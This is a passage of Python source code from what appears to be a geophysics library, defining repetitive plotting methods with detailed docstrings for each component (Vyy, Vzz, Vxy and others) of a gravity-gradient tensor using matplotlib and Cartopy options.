Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{xx}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vxx_label
return self.vxx.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vyy(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vyy component of the tensor.
Usage
-----
x.plot_vyy([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{yy}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vyy_label
return self.vyy.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vzz(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vzz component of the tensor.
Usage
-----
x.plot_vzz([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{zz}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vzz_label
return self.vzz.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vxy(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vxx component of the tensor.
Usage
-----
x.plot_vxy([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{xy}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vxy_label
return self.vxy.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vyx(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vyx component of the tensor.
Usage
-----
x.plot_vyx([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{yx}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vyx_label
return self.vyx.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vxz(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vxz component of the tensor.
Usage
-----
x.plot_vxz([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{xz}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vxz_label
return self.vxz.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vzx(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vzx component of the tensor.
Usage
-----
x.plot_vzx([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{zx}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vzx_label
return self.vzx.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vyz(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vyz component of the tensor.
Usage
-----
x.plot_vyz([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{yz}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vyz_label
return self.vyz.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vzy(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vzy component of the tensor.
Usage
-----
x.plot_vzy([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
